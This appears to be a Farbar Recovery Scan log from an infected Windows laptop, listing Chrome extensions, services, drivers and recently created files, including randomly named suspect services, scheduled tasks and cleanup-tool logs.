CHR Extension: (Inbox by Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkclgpgponpjmpfokoepglboejdobkpl [2015-11-12]
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-04-16]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 a2AntiMalware; C:\Program Files\Emsisoft Anti-Malware\a2service.exe [11332672 2016-03-24] (Emsisoft Ltd)
S4 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe [69016 2016-02-05] (Google Inc.)
S4 CLDTVHNService; C:\Program Files (x86)\DirecTV\DirecTV\Kernel\DMP\CLDTVHNService.exe [75048 2009-09-17] ()
S4 ETDService; C:\Program Files\Elantech\ETDService.exe [144104 2015-10-31] (ELAN Microelectronics Corp.)
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1253376 2009-08-27] (MAGIX AG) [File not signed]
S4 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [3276800 2008-08-07] (MAGIX®) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
S4 McciCMService; C:\Program Files (x86)\Common Files\Motive\McciCMService.exe [319488 2010-11-08] (Alcatel-Lucent) [File not signed]
S4 McciCMService64; C:\Program Files\Common Files\Motive\McciCMService.exe [517632 2010-11-08] (Alcatel-Lucent) [File not signed]
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe [270336 2001-02-23] (Microsoft Corporation) [File not signed]
R2 Micro Star SCM; C:\Program Files (x86)\System Control Manager\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S4 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
S4 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 pgsql-8.3; C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe [65536 2008-09-19] (PostgreSQL Global Development Group) [File not signed]
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-04-16] ()
S4 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [745224 2015-07-08] (DEVGURU Co., LTD.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5436176 2015-02-09] (TeamViewer GmbH)
R2 tmInstall; C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.EXE [50336 2015-09-15] (Thrustmaster®)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
S4 kBTNrls; "C:\ProgramData\QsKNKvQ\kBTNrls.exe" [X]
S4 Muibguaw; "C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn\Tugboxh.exe" -cms [X]
S4 Nijgatfy; "C:\Users\RoNiN\AppData\Roaming\Kalekuhrin\Kalekuhrin.exe" -cms [X]
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 AnyDVD; C:\Windows\System32\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 AnyDVD; C:\Windows\SysWOW64\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 ArcSoftKsUFilter; C:\Windows\System32\DRIVERS\ArcSoftKsUFilter.sys [19968 2009-05-26] (ArcSoft, Inc.)
S3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [165376 2015-07-09] (Microsoft Corporation)
S3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [36864 2015-07-09] (Microsoft Corporation)
R1 epp; C:\PROGRAM FILES\EMSISOFT ANTI-MALWARE\epp.sys [124080 2016-02-11] (Emsisoft Ltd)
S3 EUCR; C:\Windows\System32\drivers\EUCR6SK.SYS [87888 2009-12-04] (ENE Technology Inc.)
R1 mbamchameleon; C:\WINDOWS\system32\drivers\mbamchameleon.sys [109272 2015-10-05] (Malwarebytes)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-04-08] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation)
S3 MFE_RR; C:\Users\RoNiN\AppData\Local\Temp\mfe_rr.sys [24120 2016-04-07] (McAfee, Inc.)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 NTIOLib_1_0_4; C:\Program Files (x86)\msi\Live Update 5\NTIOLib_X64.sys [14136 2010-10-22] (MSI)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-17] (Realtek )
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2011-02-14] (Duplex Secure Ltd.)
S3 tmbulk; C:\Windows\System32\Drivers\tmbulk.sys [133280 2015-06-30] (© Guillemot R&D, 2015. All rights reserved.)
S3 tmhidusb; C:\Windows\system32\DRIVERS\tmhidusb.sys [170144 2015-09-15] (Thrustmaster)
S3 tmResetMin; C:\Windows\System32\Drivers\tmResetMin.sys [36000 2015-09-15] (© Guillemot R&D, 2013. All rights reserved.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-09] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-04-08 10:20 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\system32\gpedit.msc
2016-04-08 10:18 - 2016-04-08 10:18 - 00016148 _____ C:\WINDOWS\system32\RONIN-LAPTOP_RoNiN_HistoryPrediction.bin
2016-04-08 09:56 - 2016-04-08 09:56 - 00707354 _____ C:\WINDOWS\unins000.exe
2016-04-08 09:56 - 2016-04-08 09:56 - 00001535 _____ C:\WINDOWS\unins000.dat
2016-04-08 09:56 - 2016-04-08 09:56 - 00000000 ____D C:\WINDOWS\SysWOW64\GPBAK
2016-04-08 09:56 - 2008-04-14 02:11 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appmgr.dll
2016-04-08 09:56 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\SysWOW64\gpedit.msc
2016-04-07 20:55 - 2016-04-08 10:28 - 00000000 ____D C:\FRST
2016-04-07 18:06 - 2016-04-07 18:08 - 00271216 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_18.06.48_log.txt
2016-04-07 16:15 - 2016-04-07 17:52 - 00000000 ____D C:\AdwCleaner
2016-04-07 15:48 - 2016-04-07 15:48 - 00000490 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.48.47_log.txt
2016-04-07 15:05 - 2016-04-07 15:08 - 00270622 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.05.40_log.txt
2016-04-07 14:51 - 2016-04-07 14:51 - 00000947 _____ C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
2016-04-07 14:51 - 2016-04-07 14:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware
2016-04-05 13:10 - 2016-04-08 13:34 - 00000000 ____D C:\virus
2016-03-29 18:40 - 2016-03-29 18:40 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (10).ica
2016-03-29 18:29 - 2016-03-29 18:29 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (9).ica
2016-03-29 18:21 - 2016-03-29 18:21 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (8).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001380 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (5).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (7).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (6).ica
2016-03-29 18:12 - 2016-03-29 18:19 - 59554128 _____ (Citrix Systems, Inc.) C:\Users\RoNiN\Downloads\CitrixReceiver4.2.100 (1).exe
2016-03-29 18:11 - 2016-03-29 18:22 - 00734784 _____ (Oracle Corporation) C:\Users\RoNiN\Downloads\JavaSetup8u77.exe
2016-03-29 18:10 - 2016-03-29 18:10 - 02072960 _____ (Pulse Secure, LLC) C:\Users\RoNiN\Downloads\JuniperSetupClientInstaller.exe
2016-03-24 00:01 - 2016-03-24 00:01 - 04622232 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool (1).exe
2016-03-23 23:06 - 2016-03-29 18:45 - 00002282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-23 23:06 - 2016-03-29 18:45 - 00002270 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-03-23 23:04 - 2016-03-23 23:05 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup (1).exe
2016-03-23 23:02 - 2016-03-23 23:02 - 00000020 ___SH C:\Users\DefaultAppPool\ntuser.ini
2016-03-23 23:02 - 2016-03-23 23:02 - 00000000 _SHDL C:\Users\DefaultAppPool\My Documents
2016-03-23 23:02 - 2016-03-23 23:02 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Videos
2016-03-23 23:02 - 2016-03-23 23:02 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Pictures
2016-03-23 23:02 - 2016-03-23 23:02 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\My Music
2016-03-23 23:01 - 2016-03-23 23:02 - 00000000 ____D C:\Users\DefaultAppPool
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Real
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Media Center Programs
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\NVIDIA Corporation
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\NVIDIA
2016-03-23 23:01 - 2015-10-03 04:51 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Local\Google
2016-03-23 22:36 - 2016-03-23 22:45 - 04584344 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool.exe
2016-03-23 22:26 - 2016-03-23 22:26 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup.exe
2016-03-23 11:41 - 2016-03-23 11:41 - 00001054 _____ C:\Users\RoNiN\Desktop\mwbytescan2016-03-23.txt
2016-03-23 07:41 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\is-BFNHB.tmp
2016-03-22 23:30 - 2016-03-22 23:30 - 00000000 ____D C:\ProgramData\Emsisoft
2016-03-22 21:58 - 2016-04-08 10:27 - 00000000 ____D C:\Program Files\Emsisoft Anti-Malware
2016-03-22 21:12 - 2016-03-23 11:46 - 225721384 ____N (Emsisoft Ltd. ) C:\Users\RoNiN\Desktop\EmsisoftAntiMalwareSetup.exe
2016-03-22 21:04 - 2016-03-22 21:04 - 00000020 ___SH C:\Users\postgres\ntuser.ini
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\My Documents
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Videos
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Pictures
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Music
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Real
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Media Center Programs
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA Corporation
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\Google
2016-03-22 21:01 - 2016-04-05 12:43 - 00000000 ____D C:\Users\postgres
2016-03-22 20:37 - 2016-03-22 20:37 - 00671442 _____ C:\Users\RoNiN\Desktop\mwbytescan2016-03-22.txt
2016-03-22 18:54 - 2016-03-22 18:54 - 00000000 ___HD C:\$WINDOWS.~BT
2016-03-22 08:01 - 2016-04-08 09:49 - 00003650 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2016-03-21 23:37 - 2016-03-29 12:30 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware
2016-03-21 23:03 - 2016-03-21 23:03 - 00001066 _____ C:\malwarebytes scan 2016-03-21.txt
2016-03-21 19:35 - 2016-03-21 19:35 - 00000046 _____ C:\Users\RoNiN\AppData\Roaming\WB.CFG
2016-03-21 19:12 - 2016-03-21 10:23 - 00886256 _____ (Microsoft Corporation) C:\Users\RoNiN\Desktop\mssstool64.exe
2016-03-14 21:33 - 2016-03-14 21:33 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Chromium
2016-03-14 18:48 - 2016-03-14 18:48 - 00000000 ____D C:\WINDOWS\system32\del
2016-03-13 21:32 - 2016-03-13 21:32 - 00000188 _____ C:\WINDOWS\rst30.bat
2016-03-13 19:52 - 2016-03-13 19:52 - 00000000 ____D C:\WINDOWS\system32\nod
2016-03-13 19:48 - 2016-03-13 19:48 - 00000000 ____D C:\WINDOWS\system32\aro
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\c
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\ProgramData\1457912307
2016-03-13 19:36 - 2016-03-13 19:36 - 00023554 _____ C:\WINDOWS\System32\Tasks\{08080F47-0D0F-0F09-7D11-7A79790B110F}
2016-03-13 19:29 - 2016-03-13 19:38 - 00000000 ___HD C:\ProgramData\wrc
2016-03-13 19:26 - 2016-03-13 19:26 - 00631808 _____ C:\WINDOWS\wrc.dat
2016-03-13 19:24 - 2016-03-13 19:47 - 06000640 _____ C:\Program Files (x86)\GUTD8C6.tmp
2016-03-13 19:24 - 2016-03-13 19:24 - 00000000 ____D C:\Program Files (x86)\GUMD7DA.tmp
2016-03-13 19:23 - 2016-03-21 20:44 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Setup Wizard
2016-03-13 18:52 - 2016-03-13 18:52 - 00003052 _____ C:\WINDOWS\System32\Tasks\Pritc
2016-03-13 18:51 - 2016-03-13 18:51 - 00000229 _____ C:\WINDOWS\DXM.REG
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\keja
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\byeq
2016-03-13 15:11 - 2016-03-13 15:11 - 00003418 _____ C:\WINDOWS\System32\Tasks\Rocfokt
2016-03-13 14:35 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Vilvuk
2016-03-13 14:35 - 2016-03-22 23:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\MirhMevf
2016-03-13 14:32 - 2016-04-08 09:48 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-13 14:29 - 2016-03-23 07:41 - 00001181 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-13 14:29 - 2016-03-23 07:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-13 14:29 - 2016-03-23 07:41 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-03-13 14:29 - 2016-03-13 14:29 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-13 14:29 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-13 14:29 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-13 14:29 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-13 14:15 - 2016-03-13 14:27 - 22908888 _____ (Malwarebytes ) C:\Users\RoNiN\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-13 14:04 - 2016-03-13 14:04 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\MCorp
2016-03-11 19:39 - 2016-03-11 19:39 - 07600640 _____ C:\Users\RoNiN\AppData\Roaming\agent.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 01786944 _____ C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-11 19:39 - 2016-03-11 19:39 - 00018432 _____ C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:38 - 2016-03-11 19:38 - 00072729 _____ C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2016-03-11 19:36 - 2016-03-22 01:44 - 00000000 ____D C:\Users\RoNiN\AppData\Local\app
2016-03-11 19:33 - 2016-03-25 15:00 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Company
2016-03-11 19:33 - 2016-03-11 19:33 - 00003416 _____ C:\WINDOWS\System32\Tasks\Lhsorj
2016-03-11 19:32 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Kalekuhrin
2016-03-11 19:32 - 2016-03-13 14:35 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Tempfolder
2016-03-11 19:32 - 2016-03-11 19:32 - 00127488 _____ C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:32 - 2016-03-11 19:32 - 00000000 ____D C:\uninst
2016-03-11 19:27 - 2016-03-23 16:05 - 00000000 ____D C:\ProgramData\DataFile
2016-03-11 19:27 - 2016-03-11 19:27 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-03-11 19:25 - 2016-04-08 09:47 - 00000368 ____H C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job
2016-03-11 19:25 - 2016-04-08 09:47 - 00000356 _____ C:\WINDOWS\Tasks\BJZJKCUBLH1.job
2016-03-11 19:25 - 2016-03-11 19:25 - 00003444 _____ C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC
2016-03-11 19:25 - 2016-03-11 19:25 - 00002928 _____ C:\WINDOWS\System32\Tasks\BJZJKCUBLH1
2016-03-11 19:24 - 2016-03-11 19:24 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-03-11 19:18 - 2016-03-11 19:16 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-03-10 23:17 - 2016-03-10 23:17 - 00000000 ____D C:\Users\RoNiN\AppData\Local\CEF
2016-03-10 14:32 - 2016-03-10 23:19 - 00000000 ____D C:\Users\RoNiN\Downloads\DMBDMB
2016-03-09 18:06 - 2016-03-09 18:46 - 00000000 ____D C:\Users\RoNiN\Downloads\Bj The Chicago Kid - In My Mind
2016-03-09 18:04 - 2016-03-09 18:04 - 00000000 ____D C:\Program Files (x86)\basicData
2016-03-09 18:03 - 2016-03-09 18:03 - 00002560 _____ C:\Users\RoNiN\AppData\Local\uninstall.exe
2016-03-09 17:42 - 2016-03-09 17:42 - 00781238 _____ C:\Users\RoNiN\Downloads\Setup.zip
2016-03-09 17:37 - 2016-03-09 17:45 - 150662627 _____ C:\Users\RoNiN\Downloads\Bj The Chicago Kid - In My Mind.zip
2016-03-09 10:31 - 2016-02-23 08:16 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-09 10:31 - 2016-02-23 07:55 - 24592896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-09 10:31 - 2016-02-23 07:45 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-09 10:31 - 2016-02-23 06:55 - 19326464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-09 10:31 - 2016-02-23 06:48 - 21859840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-09 10:31 - 2016-02-23 06:38 - 07524864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-03-09 10:31 - 2016-02-23 06:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-09 10:31 - 2016-02-23 06:00 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-03-09 10:31 - 2016-02-23 05:58 - 18800640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-09 10:30 - 2016-02-23 10:53 - 01314496 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-03-09 10:30 - 2016-02-23 10:52 - 00858408 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-09 10:30 - 2016-02-23 10:51 - 00633184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-03-09 10:30 - 2016-02-23 10:51 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-09 10:30 - 2016-02-23 10:50 - 00630160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-09 10:30 - 2016-02-23 10:48 - 08022368 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-09 10:30 - 2016-02-23 10:48 - 01294352 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-09 10:30 - 2016-02-23 10:48 - 01123952 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-09 10:30 - 2016-02-23 10:41 - 01150816 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-09 10:30 - 2016-02-23 10:41 - 00299600 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL
2016-03-09 10:30 - 2016-02-23 10:41 - 00078040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkscli.dll
2016-03-09 10:30 - 2016-02-23 10:40 - 00110584 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvcli.dll
2016-03-09 10:30 - 2016-02-23 10:38 - 00272752 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-09 10:30 - 2016-02-23 10:36 - 00080128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netapi32.dll
2016-03-09 10:30 - 2016-02-23 10:11 - 00781984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2016-03-09 10:30 - 2016-02-23 10:11 - 00658784 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-09 10:30 - 2016-02-23 10:11 - 00103776 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-03-09 10:30 - 2016-02-23 10:08 - 03622272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-09 10:30 - 2016-02-23 10:07 - 22322624 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-09 10:30 - 2016-02-23 09:39 - 00607416 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-03-09 10:30 - 2016-02-23 09:30 - 01643872 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-09 10:30 - 2016-02-23 09:25 - 01085632 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-03-09 10:30 - 2016-02-23 09:23 - 00952968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-03-09 10:30 - 2016-02-23 09:21 - 00529456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-09 10:30 - 2016-02-23 09:21 - 00141152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-09 10:30 - 2016-02-23 09:11 - 00249976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL
2016-03-09 10:30 - 2016-02-23 09:11 - 00073360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srvcli.dll
2016-03-09 10:30 - 2016-02-23 09:11 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wkscli.dll
2016-03-09 10:30 - 2016-02-23 09:09 - 00229352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-09 10:30 - 2016-02-23 09:06 - 00069232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netapi32.dll
2016-03-09 10:30 - 2016-02-23 08:58 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-03-09 10:30 - 2016-02-23 08:50 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-09 10:30 - 2016-02-23 08:50 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetCfgNotifyObjectHost.exe
2016-03-09 10:30 - 2016-02-23 08:42 - 00658536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2016-03-09 10:30 - 2016-02-23 08:42 - 00467296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-03-09 10:30 - 2016-02-23 08:42 - 00078176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-03-09 10:30 - 2016-02-23 08:39 - 02879024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-09 10:30 - 2016-02-23 08:38 - 20858360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-09 10:30 - 2016-02-23 08:35 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-03-09 10:30 - 2016-02-23 08:20 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-03-09 10:30 - 2016-02-23 08:17 - 00333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-03-09 10:30 - 2016-02-23 08:15 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
